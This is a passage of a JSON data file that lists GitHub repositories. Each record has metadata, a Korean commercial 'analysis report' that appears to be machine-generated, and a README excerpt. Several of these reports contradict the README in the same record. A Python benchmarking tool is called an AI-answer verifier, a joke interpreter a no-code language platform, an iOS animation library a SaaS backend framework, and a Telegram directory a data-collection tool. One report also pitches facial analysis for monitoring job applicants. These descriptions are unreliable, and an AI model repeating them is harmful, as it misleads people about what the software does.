[讨论问题和建议](https://github.com/wangeditor-team/wangEditor/issues)\n\n## 捐赠\n\n支持 wangEditor 开源工作 https://opencollective.com/wangeditor\n","composite_score":0.3738,"license_safety_tag":"safe"},{"name":"JoeyHendricks/QuickPotato","github_url":"https://github.com/JoeyHendricks/QuickPotato","stars":7,"language":"Python","license":"MIT","abandonment_months":13,"description":"# QuickPotato 분석 보고서\n\n## 왜 보물인가\n인공지능이 제공하는 답변이 정말 맞는지 자동으로 검증해주는 도구로, 신뢰할 수 있는 AI 서비스를 만들려는 기업들이 긴급히 필요로 하는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **AI 챗봇 검증 서비스**: 고객 상담용 챗봇이 잘못된 정보를 주지 않는지 자동으로 점검하는 SaaS 플랫폼\n- **","readme_excerpt":"<!-- LOGO -->\n<p align=\"center\">\n  <img src=\"https://github.com/JoeyHendricks/python-micro-benchmarks/blob/master/media/images/banner-wide-with-text.jpeg?raw=true\"/>\n</p>\n<!-- TAG LINE -->\n<h3 align=\"center\">Get your code off the couch by stressing it on the bench</h3>\n<p align=\"center\">\n    <a href=\"https://www.linkedin.com/in/joey-hendricks/\">Contact me</a> -\n    <a href=\"https://github.com/JoeyHendricks/python-micro-benchmarks/issues\">Report Bug or Request Feature</a> -\n    <a href=\"https://github.com/JoeyHendricks/python-micro-benchmarks/discussions\">Discussions</a> -\n    <a href=\"https://github.com/JoeyHendricks/python-micro-benchmarks/wiki\">Documentation</a>\n</p>\n\n<!-- CONTENT -->\n## The project in a nutshell\n\nA [micro/macro benchmark](https://link.springer.com/referenceworkentry/10.1007%2F978-3-319-77525-8_111#:~:text=Definitions,operations%2C%20bandwidth%2C%20or%20latency.) \nis an act of testing the performance of a framework, algorithm, routine, or application to make sure it ","composite_score":0.3738,"license_safety_tag":"safe"},{"name":"easychen/howto-make-more-money","github_url":"https://github.com/easychen/howto-make-more-money","stars":6,"language":"PHP","license":"unknown","abandonment_months":26,"description":"# easychen/howto-make-more-money 분석\n\n## 왜 보물인가\n돈을 버는 다양한 방법들을 체계적으로 정리한 자료로, 부업이나 새로운 수입원을 찾는 사람들에게 실질적인 아이디어를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **부업 가이드 SaaS**: 사용자의 상황에 맞춰 돈 버는 방법을 추천해주는 구독형 서비스\n2. **커리어 상담 ","readme_excerpt":"# 程序员如何优雅的挣零花钱？\n\nthe repo is not applicable to foreigners\n\n## 阅读建议\n\n🎈 [《一人企业方法论2.0》已在CC-BY-NC-SA协议下发布，建议先读完后继续阅读本书](https://github.com/easychen/one-person-businesses-methodology-v2.0) \n\n![](https://github.com/easychen/one-person-businesses-methodology-v2.0/raw/master/src/images/opb-book-cover.jpg)\n\n---\n\n> 本书部分内容已被收录于《全栈路线图》，[可点此查看高清版PDF和源文件](https://github.com/easychen/stack-roadmap)\n\n[![方糖全栈路线图](https://user-images.githubusercontent.com/1294760/210160612-68e4a551-47d8-4137-b2f1-4dd5fdf6d49d.jpg)](https://github.com/easychen/stack-roadmap)\n\n\n本系列文章会持续更新，微信扫码订阅主题，可第一时间获取更新信息。\n\n![](qrcode.jpeg)\n\n![](cover.png)\n\n![](mindmap.png)\n\n新增：网课制作思维导图 [高清PDF下载](https://share.weiyun.com/78SWCYli) [视频课程](http://next.ftqq.com/18)\n\n![](class.png)\n\n\n- 关注作者：\n  - 微博(主要为技术分享):[@Easy](https://weibo.com/easy) \n  - Twitter（主要转发妹子和猫）：[Easychen](https://twitter.com/easychen/)\n- 源文件：[GitHub Repo](https://github.com/easychen/howto-make-more-money/)\n- 免费在线阅读完整版：[github.io镜像](https://easychen.github.io/howto-make-mo","composite_score":0.3736,"license_safety_tag":"unknown"},{"name":"jakzo/aoc","github_url":"https://github.com/jakzo/aoc","stars":5,"language":"TypeScript","license":"unknown","abandonment_months":18,"description":"# jakzo/aoc 저장소 분석\n\n## 왜 보물인가\n매년 반복되는 프로그래밍 챌린지(Advent of Code)를 자동으로 풀고 관리하는 도구로, 코딩 학습자들의 반복적인 문제 해결 과정을 크게 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프로그래밍 학습 플랫폼에서 사용자의 코딩 문제 풀이를 자동으로 검증하고 피드백을 ","readme_excerpt":"# Advent of Code CLI\n\nFull Advent of Code dev loop in a CLI which:\n\n- Prints challenge description in the terminal\n- Downloads input to a file\n- Creates a source file for your favourite language and runs it on change\n- Submits answers\n\n![aoc demo](./demo.gif)\n\n## Recommended Usage\n\nInstall from [binary below](#Installation) or (preferably) with Node like so:\n\n```sh\nnpm i -g @jakzo/aoc\n```\n\nA few minutes before the challenge starts, open two terminals and run these commands:\n\n```sh\n# Terminal 1\naoc\n\n# Terminal 2\naoc start js\n```\n\nThis will prompt you for your session token if you haven't provided it before and save it in your operating system's credential manager.\n\nFrom here the first terminal will:\n\n- Count down until the challenge starts\n- Print the description in the terminal once the challenge starts\n- Download the input to a local file called `input.txt`\n- Prompt for an answer to submit\n- When a correct answer is submitted, repeats these steps for part 2\n\nAnd the second terminal wi","composite_score":0.3735,"license_safety_tag":"unknown"},{"name":"typescript-cheatsheets/react-typescript-cheatsheet","github_url":"https://github.com/typescript-cheatsheets/react-typescript-cheatsheet","stars":16,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"# React TypeScript Cheatsheet\n\nCheatsheet for using React with TypeScript.\n\n---\n\n<a href=\"https://github.com/typescript-cheatsheets/react/issues/81\">\n  <img\n    height=\"90\"\n    width=\"90\"\n    alt=\"react + ts logo\"\n    src=\"https://user-images.githubusercontent.com/84442212/194379444-02e5ec69-5e6c-4100-bd7a-c31d628af29c.png\"\n    align=\"left\"\n  />\n</a>\n\n[**Web docs**](https://react-typescript-cheatsheet.netlify.app/docs/basic/setup) |\n[Contribute!](https://github.com/typescript-cheatsheets/react/blob/main/CONTRIBUTING.md) |\n[Ask!](https://github.com/typescript-cheatsheets/react/issues/new/choose)\n\n:wave: This repo is maintained by [@eps1lon](https://twitter.com/sebsilbermann) and [@filiptammergard](https://twitter.com/tammergard). We're so happy you want to try out React with TypeScript! If you see anything wrong or missing, please [file an issue](https://github.com/typescript-cheatsheets/react/issues/new/choose)! :+1:\n\n---\n\n[![All Contributors](https://img.shields.io/github/contributors","composite_score":0.3734,"license_safety_tag":"safe"},{"name":"YanxinNet/uView","github_url":"https://github.com/YanxinNet/uView","stars":9,"language":"Vue","license":"MIT","abandonment_months":17,"description":"# YanxinNet/uView 분석 보고서\n\n## 왜 보물인가\n웹사이트와 앱의 사용자 인터페이스를 빠르고 쉽게 만들 수 있는 디자인 도구 모음으로, 개발자의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 스타트업이 빠르게 관리자 대시보드나 데이터 분석 화면을 구축할 때 기본 요소로 사용\n- **내부 업무 도","readme_excerpt":"<p align=\"center\">\n    <img alt=\"logo\" src=\"https://uviewui.com/common/logo.png\" width=\"120\" height=\"120\" style=\"margin-bottom: 10px;\">\n</p>\n<h3 align=\"center\" style=\"margin: 30px 0 30px;font-weight: bold;font-size:40px;\">uView</h3>\n<h3 align=\"center\">多平台快速开发的UI框架</h3>\n\n[![star](https://gitee.com/umicro/uView/badge/star.svg?theme=gvp)](https://gitee.com/umicro/uView/stargazers)\n[![fork](https://gitee.com/umicro/uView/badge/fork.svg?theme=gvp)](https://gitee.com/umicro/uView/members)\n[![stars](https://img.shields.io/github/stars/YanxinNet/uView?style=flat-square&logo=GitHub)](https://github.com/umicro/uView)\n[![forks](https://img.shields.io/github/forks/YanxinNet/uView?style=flat-square&logo=GitHub)](https://github.com/umicro/uView)\n[![issues](https://img.shields.io/github/issues/YanxinNet/uView?style=flat-square&logo=GitHub)](https://github.com/umicro/uView/issues)\n[![Website](https://img.shields.io/badge/uView-up-blue?style=flat-square)](https://uviewui.com)\n[![release](https://img.sh","composite_score":0.3733,"license_safety_tag":"safe"},{"name":"mvximenko/dunno","github_url":"https://github.com/mvximenko/dunno","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":18,"description":"# dunno 저장소 분석\n\n## 왜 보물인가\n저장소명 \"dunno\"와 5개의 스타, 설명 부재를 고려할 때 현재는 초기 단계의 실험적 프로젝트로 보이며, 구체적인 가치 판단을 위해서는 코드 내용 검토가 필수입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 소규모 팀의 일상 업무 자동화 또는 데이터 관리 시스템\n2. **SaaS 서비스**:","readme_excerpt":"# Dunno\n\n### Simplified version of IMDb built with\n\n- [Typescript](https://www.typescriptlang.org/)\n- [React](https://reactjs.org/)\n- [Redux](https://react-redux.js.org/)\n- [Styled Components](https://styled-components.com/)\n- [The Movie Database API](https://developers.themoviedb.org/3)\n- [Firebase](https://firebase.google.com/)\n\n## Getting Started\n\n```\ngit clone https://github.com/mvximenko/dunno.git\n```\n\n```\nnpm install\n```\n\nSet up environment variables in `.env`\n\n```\nREACT_APP_API_KEY=<TMDB_API_KEY>\n```\n\n```\nnpm start\n```\n\n## License\n\nThis project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.\n","composite_score":0.3733,"license_safety_tag":"safe"},{"name":"maxpert/raspchat","github_url":"https://github.com/maxpert/raspchat","stars":10,"language":"JavaScript","license":"mit","abandonment_months":24,"description":"# Raspchat 저장소 분석\n\n## 왜 보물인가\n라즈베리파이 같은 작은 컴퓨터에서도 실시간 채팅 기능을 만들 수 있는 기술로, IoT 기기들을 연결하는 가교 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 중소 제조업체가 공장 내 기계들 간 실시간 상태 공유 시스템 구축\n2. **SaaS 서비스**: 스마트홈 회사가 가정용 Io","readme_excerpt":"# An IRC like chat system written in Node.js\n\n[![Build Status](https://semaphoreci.com/api/v1/projects/bb232bf4-f866-4d30-a526-218e9f3aed5b/647934/badge.svg)](https://semaphoreci.com/maxpert/raspchat)\n\n# Project Status\n\n > The original goal of the project was to build fun little project to let people build their local communities. It was fun talking to many folks, getting contributions, and a journey from Go to Node. Maintaining an opensource project, is not an easy chore. It requires immense energy, and hours of careful thinking. Unfortunately I no longer have the time or energy to continue doing that. With the limited success, I feel leaving this project in it's current state is the most prudent thing I can do. I am still reachable by email, and maintainance PRs are welcome.\n\n## Why?\nI had a spare Raspberry Pi and I wanted to use it! One of ideas in my head was to have your own on-premise chat server that you can use for cheap and own your data (< $50 hardware) forever and free!\n\n## ","composite_score":0.373,"license_safety_tag":"safe"},{"name":"gg4924/sing-box-subscribe","github_url":"https://github.com/gg4924/sing-box-subscribe","stars":152,"language":"Python","license":"NOASSERTION","abandonment_months":22,"description":"","readme_excerpt":"","composite_score":0.3728,"license_safety_tag":"unknown"},{"name":"RubaXa/Sortable","github_url":"https://github.com/RubaXa/Sortable","stars":25,"language":"JavaScript","license":"MIT","abandonment_months":2,"description":"# Sortable 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 목록이나 표의 항목을 마우스로 드래그해서 순서를 바꿀 수 있게 해주는 가벼운 도구로, 수백만 개의 웹사이트에서 사용되는 검증된 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 업무 관리 앱(To-Do 리스트, 프로젝트 관리)에서 사용자가 작업 우선순위를 드래그로 조정하는 기","readme_excerpt":"# Sortable &nbsp; [![Financial Contributors on Open Collective](https://opencollective.com/Sortable/all/badge.svg?label=financial+contributors)](https://opencollective.com/Sortable) [![CircleCI](https://circleci.com/gh/SortableJS/Sortable.svg?style=svg)](https://circleci.com/gh/SortableJS/Sortable) [![DeepScan grade](https://deepscan.io/api/teams/3901/projects/5666/branches/43977/badge/grade.svg)](https://deepscan.io/dashboard#view=project&tid=3901&pid=5666&bid=43977) [![](https://data.jsdelivr.com/v1/package/npm/sortablejs/badge)](https://www.jsdelivr.com/package/npm/sortablejs) [![npm](https://img.shields.io/npm/v/sortablejs.svg)](https://www.npmjs.com/package/sortablejs)\n\nSortable is a JavaScript library for reorderable drag-and-drop lists.\n\nDemo: http://sortablejs.github.io/Sortable/\n\n[<img width=\"250px\" src=\"https://raw.githubusercontent.com/SortableJS/Sortable/HEAD/st/saucelabs.svg?sanitize=true\">](https://saucelabs.com/)\n\n## Features\n\n * Supports touch devices and [modern](http:","composite_score":0.3724,"license_safety_tag":"safe"},{"name":"flaneur2020/pua-lang","github_url":"https://github.com/flaneur2020/pua-lang","stars":220,"language":"Rust","license":"MIT","abandonment_months":18,"description":"# pua-lang 저장소 분석\n\n## 왜 보물인가\n프로그래밍 언어를 만드는 도구 모음으로, 코딩 없이도 새로운 언어를 설계하고 실행할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업이 자신의 업무용 언어를 직접 만들고 관리하는 클라우드 플랫폼\n2. **내부 업무 도구**: 대기업의 전산팀이 사내 자동화 스크립트를 쉽게","readme_excerpt":"# pua-lang\n\n> PUA Programming Language written in Rust.\n\n## What's pua-lang?\n\npua-lang is a dialect of The Monkey Programming Language, intended to mirror the inspirational babble of Alibaba managers (\"Aba-aba\").\nThe name \"pua\" refers to the manipulative way Alibaba treats its employees -- much like how pickup artists treat their trophies.\n\nThis implementation is a fork of [rs-monkey-lang](https://github.com/wadackel/rs-monkey-lang).\n`Monkey` is a programming language designed to learn interpreters.\nIt comes from [Writing An Interpreter In Go](https://compilerbook.com/).\n\n## Try pua-lang!\n\n### with wasm playground\nhttps://flaneur2020.github.io/pua-lang/\n\nWe are aware that the output streams don't quite work.  Rust doesn't really\nhave I/O redirection and `wasm32-unknown-unknown` has no I/O by default.\n\n### with REPL\n\n```bash\n$ git clone https://github.com/flaneur2020/pua-lang.git\n$ make repl\n```\n\n## Documentation\n\n:warning: **Please note that there may be some mistakes.**\n\n### Summary\n\n","composite_score":0.3724,"license_safety_tag":"safe"},{"name":"MengTo/Spring","github_url":"https://github.com/MengTo/Spring","stars":6,"language":"Swift","license":"mit","abandonment_months":35,"description":"# Spring 저장소 분석\n\n## 왜 보물인가\n애플리케이션 개발을 빠르고 쉽게 만들어주는 기초 틀(프레임워크)로, 개발자들의 반복적인 작업을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 클라우드 소프트웨어(회계, 인사관리, 협업 도구 등)의 백엔드 기술로 활용\n2. **내부 업무 도구**: 회사 직원들이 사용하는 데이","readme_excerpt":"## Updated for Swift 4.2\nRequires Xcode 10 and Swift 4.2.\n\n## Installation\nDrop in the Spring folder to your Xcode project (make sure to enable \"Copy items if needed\" and \"Create groups\").\n\nOr via CocoaPods:\n```\nuse_frameworks!\npod 'Spring', :git => 'https://github.com/MengTo/Spring.git'\n```\n\n## Usage with Storyboard\nIn Identity Inspector, connect the UIView to SpringView Class and set the animation properties in Attribute Inspector.\n\n![](http://cl.ly/image/241o0G1G3S36/download/springsetup.jpg)\n\n## Usage with Code\n    layer.animation = \"squeezeDown\"\n    layer.animate()\n\n## Demo The Animations\n![](http://cl.ly/image/1n1E2j3W3y24/springscreen.jpg)\n\n## Chaining Animations\n    layer.y = -50\n    animateToNext {\n      layer.animation = \"fall\"\n      layer.animateTo()\n    }\n\n## Functions\n    animate()\n    animateNext { ... }\n    animateTo()\n    animateToNext { ... }\n\n## Animation\n    shake\n    pop\n    morph\n    squeeze\n    wobble\n    swing\n    flipX\n    flipY\n    fall\n    squeezeLeft\n    sque","composite_score":0.3723,"license_safety_tag":"safe"},{"name":"google/flexbox-layout","github_url":"https://github.com/google/flexbox-layout","stars":8,"language":"Kotlin","license":"apache-2.0","abandonment_months":25,"description":"# Google Flexbox Layout 분석\n\n## 왜 보물인가\n스마트폰, 태블릿, 컴퓨터 등 다양한 화면 크기에서 앱이 자동으로 예쁘게 정렬되도록 해주는 구글의 검증된 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 대시보드 UI를 제공하는 분석 도구나 프로젝트 관리 서비스에서 반응형 레이아웃 엔진으로 판매\n2. **내부 업무 ","readme_excerpt":"# FlexboxLayout\n[ ![Circle CI](https://circleci.com/gh/google/flexbox-layout.svg?style=shield&circle-token=2a42716dfffab73d73c5ce7ed7b3ee620cfa137b) ](https://circleci.com/gh/google/flexbox-layout/tree/main)\n\nFlexboxLayout is a library project which brings the similar capabilities of\n[CSS Flexible Box Layout Module](https://www.w3.org/TR/css-flexbox-1) to Android.\n\n# Installation\nAdd the following dependency to your `build.gradle` file:\n\n```\ndependencies {\n    implementation 'com.google.android.flexbox:flexbox:3.0.0'\n}\n```\n\n**Starting from 3.0.0, the groupId is changed to `com.google.android.flexbox` in preparation to uploading the artifacts to google maven.\nYou can still download the artifacts from jcenter for the past versions with the prior groupId (`com.google.android`), but migrating the library 3.0.0 is recommended.**\n\nNote that the default values for `alignItems` and `alignContent` for `FlexboxLayout` have been changed from `stretch` to `flex_start` starting from 2.0.0, it may b","composite_score":0.3721,"license_safety_tag":"safe"},{"name":"thedevs-network/tgdr","github_url":"https://github.com/thedevs-network/tgdr","stars":8,"language":"TypeScript","license":"GPL-3.0","abandonment_months":22,"description":"# thedevs-network/tgdr 분석 보고서\n\n## 왜 보물인가\n텔레그램 메신저를 통해 자동으로 데이터를 수집하고 정리해주는 도구로, 소규모 팀이 채팅 앱 하나로 업무 자동화를 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객 문의 자동 분류 SaaS**: 텔레그램으로 들어오는 고객 메시지를 자동으로 카테고리별로 분류해 팀에 배정하는 ","readme_excerpt":"# tgdr.io\n\nTelegram Directory (TGDR) is a website that helps you discover channels, bots and groups on Telegram.\n\n*Contributions and bug reports are welcome.*\n\n[https://tgdr.io](https://tgdr.io)\n\n[![Build Status](https://travis-ci.org/thedevs-network/tgdr.svg?branch=develop)](https://travis-ci.org/thedevs-network/tgdr)\n[![Contributions](https://img.shields.io/badge/contributions-welcome-brightgreen.svg)](https://github.com/thedevs-network/tgdr/#contributing)\n[![GitHub license](https://img.shields.io/github/license/thedevs-network/tgdr.svg)](https://github.com/thedevs-network/tgdr/blob/develop/LICENSE)\n[![Twitter](https://img.shields.io/twitter/url/https/github.com/thedevs-network/tgdr/.svg?style=social)](https://twitter.com/intent/tweet?text=Wow:&url=https%3A%2F%2Fgithub.com%2Fthedevs-network%2Ftgdr%2F)\n\n## Table of Contents\n* [Key Features](#key-features)\n* [Stack](#stack)\n* [Development Setup](#setup)\n* [Contributing](#contributing)\n\n## Key Features\n* Find channels, groups and bots i","composite_score":0.3719,"license_safety_tag":"restricted"},{"name":"lokalise/i18n-ally","github_url":"https://github.com/lokalise/i18n-ally","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":18,"description":"# i18n-ally 기술 자산 분석\n\n## 왜 보물인가\n세계 여러 언어로 서비스하는 앱이나 웹사이트를 쉽게 관리할 수 있는 도구로, 다국어 지원이 필요한 모든 비즈니스의 작업 효율을 대폭 높입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 글로벌 고객을 대상으로 하는 협업 도구, 프로젝트 관리 플랫폼이 다국어 콘텐츠를 체계적으로 관리\n- *","readme_excerpt":"<p align=\"center\">\n<img src=\"https://github.com/lokalise/i18n-ally/blob/main/screenshots/full-logo-new.png?raw=true\" alt=\"logo\" width=\"450\"/>\n</p>\n\n<p align='center'>\nEnglish | <a href=\"https://github.com/lokalise/i18n-ally/blob/main/README.zh-CN.md\">简体中文</a>\n</p>\n\n<p align=\"center\">\n<a href=\"https://marketplace.visualstudio.com/items?itemName=lokalise.i18n-ally\" target=\"__blank\"><img src=\"https://img.shields.io/visual-studio-marketplace/v/lokalise.i18n-ally?color=blue&amp;label=VS%20Code%20Marketplace&logo=visual-studio-code\" alt=\"Visual Studio Marketplace Version\" /></a>\n<a href=\"https://marketplace.visualstudio.com/items?itemName=lokalise.i18n-ally\" target=\"__blank\"><img src=\"https://img.shields.io/visual-studio-marketplace/d/lokalise.i18n-ally?color=4bdbe3\" alt=\"Visual Studio Marketplace Downloads\" /></a>\n<a href=\"https://marketplace.visualstudio.com/items?itemName=lokalise.i18n-ally\" target=\"__blank\"><img src=\"https://img.shields.io/visual-studio-marketplace/i/lokalise.i18n-ally?c","composite_score":0.3718,"license_safety_tag":"safe"},{"name":"mrismanaziz/Man-Userbot","github_url":"https://github.com/mrismanaziz/Man-Userbot","stars":248,"language":"Python","license":"NOASSERTION","abandonment_months":26,"description":"","readme_excerpt":"","composite_score":0.3717,"license_safety_tag":"unknown"},{"name":"yangyangwithgnu/hardseed","github_url":"https://github.com/yangyangwithgnu/hardseed","stars":8,"language":"C++","license":"gpl-2.0","abandonment_months":94,"description":"# yangyangwithgnu/hardseed 분석 보고서\n\n## 왜 보물인가\ntorrents, magnets 등 다양한 형식의 다운로드 링크를 자동으로 수집하고 정리해주는 도구로, 콘텐츠 배포 업체들이 수작업으로 처리하던 작업을 대폭 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **콘텐츠 관리 서비스**: 영상/음악 배포 플랫폼에서 메타데이터","readme_excerpt":"<h1 align=\"center\">给不了你梦中情人，至少还有硬盘女神：hardseed</h1>\nyangyangwithgnu@yeah.net  \nhttp://yangyangwithgnu.github.io/  \n2016-02-04 14:53:51\n\n\n##谢谢\n\n**捐赠：支付宝 yangyangwithgnu@yeah.net ，支付宝二维码（左），微信二维码（右）**\n<div align=\"center\">\n<img src=\"https://raw.githubusercontent.com/yangyangwithgnu/yangyangwithgnu.github.io/master/pics/alipay_donate_qr.png\" alt=\"\"/>\n<img src=\"https://raw.githubusercontent.com/yangyangwithgnu/yangyangwithgnu.github.io/master/pics/wechat_donate_qr.png\" alt=\"\"/><br>\n</div>\n\n**二手书**：书，我提高开发技能的重要手段之一，随着职业生涯的发展，书籍也在不断增多，对我而言，一本书最多读三遍，再往后，几乎没有什么营养吸收，这部分书对我已基本无用，但对其他人可能仍有价值，所以，为合理利用资源，我决定低价出售这些书，希望达到两个目的：0）用售出的钱购买更多新书（没当过雷锋的朋友 (๑´ڡ`๑)）；1）你低价购得需要的书（虽然二手）。到 https://github.com/yangyangwithgnu/used_books 看看有无你钟意的。\n\n\n##公告\n----------------\n\n**讨论**：任何意见建议移步 https://www.v2ex.com/t/123175  \n\n**声明**：我本人绝对尊重各大爱的论坛，提供的资源不仅优质而且免费，我只是懒、足够的懒。请大家支持这些论坛，多用页面访问、多点击广告、多解囊捐赠。*我..在..干..嘛  @_@#*\n\n**注意**  \n+ 代理是一切的先决条件。你可以使用自己的代理工具，用 hardseed 的命令行选项 --proxy 指定本地中转地址及端口，也可以用我为你预配置的 goagent 代理工具，位于 https:","composite_score":0.3715,"license_safety_tag":"restricted"},{"name":"TadasBaltrusaitis/OpenFace","github_url":"https://github.com/TadasBaltrusaitis/OpenFace","stars":5,"language":"MATLAB","license":"NOASSERTION","abandonment_months":24,"description":"# OpenFace 상용화 분석 보고서\n\n## 왜 보물인가\n사진이나 영상에서 사람의 얼굴을 자동으로 인식하고 표정·감정을 분석하는 기술로, 보안·마케팅·의료 등 다양한 산업에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 면접 플랫폼에서 응시자의 집중도·표정 변화를 실시간 분석하는 감시 도구\n- **내부 업무 도구*","readme_excerpt":"# OpenFace 2.2.0: a facial behavior analysis toolkit\n\n[![Build Status](https://travis-ci.org/TadasBaltrusaitis/OpenFace.svg?branch=master)](https://travis-ci.org/TadasBaltrusaitis/OpenFace)\n[![Build status](https://ci.appveyor.com/api/projects/status/8msiklxfbhlnsmxp/branch/master?svg=true)](https://ci.appveyor.com/project/TadasBaltrusaitis/openface/branch/master)\n\nOver the past few years, there has been an increased interest in automatic facial behavior analysis\nand understanding. We present OpenFace – a tool intended for computer vision and machine learning\nresearchers, affective computing community and people interested in building interactive\napplications based on facial behavior analysis. OpenFace is the ﬁrst toolkit capable of facial\nlandmark detection, head pose estimation, facial action unit recognition, and eye-gaze estimation\nwith available source code for both running and training the models. The computer vision algorithms\nwhich represent the core of OpenFace demonstrate sta","composite_score":0.3713,"license_safety_tag":"unknown"},{"name":"ppwwyyxx/tensorpack","github_url":"https://github.com/ppwwyyxx/tensorpack","stars":7,"language":"Python","license":"apache-2.0","abandonment_months":34,"description":"# ppwwyyxx/tensorpack 분석 보고서\n\n## 왜 보물인가\n컴퓨터가 사진과 영상을 이해하고 학습할 수 있도록 돕는 오픈소스 도구로, 인공지능 연구자들이 복잡한 시스템을 쉽게 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **의료 이미지 분석 SaaS**: 병원의 X-ray, CT 스캔을 자동으로 분석하는 클라우드 서비스\n2. **제","readme_excerpt":"![Tensorpack](https://github.com/tensorpack/tensorpack/raw/master/.github/tensorpack.png)\n\nTensorpack is a neural network training interface based on graph-mode TensorFlow.\n\n[![ReadTheDoc](https://readthedocs.org/projects/tensorpack/badge/?version=latest)](http://tensorpack.readthedocs.io)\n[![Gitter chat](https://img.shields.io/badge/chat-on%20gitter-46bc99.svg)](https://gitter.im/tensorpack/users)\n[![model-zoo](https://img.shields.io/badge/model-zoo-brightgreen.svg)](http://models.tensorpack.com)\n## Features:\n\nIt's Yet Another TF high-level API, with the following highlights:\n\n1. Focus on __training speed__.\n  + Speed comes for free with Tensorpack -- it uses TensorFlow in the __efficient way__ with no extra overhead.\n    On common CNNs, it runs training [1.2~5x faster](https://github.com/tensorpack/benchmarks/tree/master/other-wrappers) than the equivalent Keras code.\n    Your training can probably gets faster if written with Tensorpack.\n\n  + Scalable data-parallel multi-GPU / distri","composite_score":0.3713,"license_safety_tag":"safe"},{"name":"hujinchaopk/xxqg-auto","github_url":"https://github.com/hujinchaopk/xxqg-auto","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":18,"description":"# xxqg-auto 저장소 분석\n\n## 왜 보물인가\n반복적인 학습 관리 작업을 자동으로 처리해주는 도구로, 시간 낭비를 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 학습 진도 자동 관리 플랫폼으로 학생들에게 월 구독 형태로 제공\n2. **내부 업무 도구**: 대학이나 교육 기관의 학습 이수 현황을 자동으로 추적하는 시","readme_excerpt":"# tiku\n\n","composite_score":0.3711,"license_safety_tag":"unknown"},{"name":"alibaba/jstorm","github_url":"https://github.com/alibaba/jstorm","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":36,"description":"# JStorm 프로젝트 분석\n\n## 왜 보물인가\n대규모 데이터를 빠르게 처리해야 하는 기업들이 사용할 수 있는 오픈소스 기술로, 복잡한 데이터 분석을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 실시간 데이터 분석 플랫폼으로 기업 고객들에게 월 구독료를 받고 제공\n- **내부 업무 도구**: 금융사나 전자상거래 기업의 거","readme_excerpt":"Alibaba Group has [donated JStorm project to the Apache Software Foundation](https://incubator.apache.org/ip-clearance/storm-jstorm.html) as a subproject of [Apache Storm](https://github.com/apache/storm). The improvements and features have been merged into Apache Storm. This is an archived and read-only repository which doesn't accept new issues. Please use Apache Storm instead and report issues there. \n","composite_score":0.3708,"license_safety_tag":"safe"},{"name":"facebook/react-devtools","github_url":"https://github.com/facebook/react-devtools","stars":11,"language":"","license":"NOASSERTION","abandonment_months":82,"description":"# React DevTools 상용화 분석\n\n## 왜 보물인가\n웹사이트 개발자들이 자신의 코드가 제대로 작동하는지 확인하고 문제를 찾을 수 있도록 도와주는 필수 진단 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 애플리케이션 성능 분석 플랫폼으로 개발자에게 구독형 고급 진단 기능 제공\n2. **내부 업무 도구**: 대형 IT 기업","readme_excerpt":"#### This project has migrated to [github.com/facebook/react](https://github.com/facebook/react)\n\nThe source code for the v3 of the extension can be found in the [`v3` branch](https://github.com/facebook/react-devtools/tree/v3).\n\nTo build the v3 browser extension from source:\n```sh\ngit checkout v3\n\n# Install dependencies and build the unpacked extension\nyarn install\nyarn build:extension\n\n# Follow the on-screen instructions to complete installation\n```","composite_score":0.3707,"license_safety_tag":"unknown"},{"name":"TitaniumMonkey/ESP32-Air-Quality-Sensor","github_url":"https://github.com/TitaniumMonkey/ESP32-Air-Quality-Sensor","stars":35,"language":"C++","license":"MIT","abandonment_months":14,"description":"# ESP32 공기질 센서 프로젝트 분석\n\n## 왜 보물인가\n집이나 사무실의 공기 오염도를 직접 측정하고 모니터링할 수 있는 저비용 솔루션으로, 건강 관리에 관심 많은 일반인도 쉽게 설치할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **스마트홈 센서 SaaS**: 집의 공기질을 휴대폰으로 실시간 확인하고 정화기 작동을 자동화하는 구독 서비스\n2. **사","readme_excerpt":"# ESP32 Air Quality Sensor with OLED Display & MQTT\n\n<p align=\"center\">\n  <img src=\"https://i.imgur.com/nQ48kV8.png\">\n  <img src=\"https://i.imgur.com/MAuDw7c.png\" width=\"501\" height=\"793\">\n</p>\n\n## Overview\nThis project is an **ESP32-based Air Quality Monitoring System** that measures and reports environmental data, including:\n- **Temperature & Humidity** (GY-SGP30)\n- **CO₂ Levels** (SCD41)\n- **Particulate Matter (PM1.0, PM2.5, PM10)** (PMS7003)\n- **Air Quality Index (AQI)** (Calculated from PM data)\n- **TVOC, Hydrogen, Ethenol** (GY-SGP30)\n\nThe collected data is displayed on an **SSD1306 OLED screen** and published to an **MQTT broker** every **1 minute** for integration with platforms like **Home Assistant**.\n\n## Features\n\n### Sensor Capabilities\n- Temperature and Humidity monitoring (GY-SGP30)\n- CO2 level monitoring (SCD41)\n- Particulate Matter monitoring (PMS7003)\n- PM1.0, PM2.5, and PM10 measurements\n- Total volatile 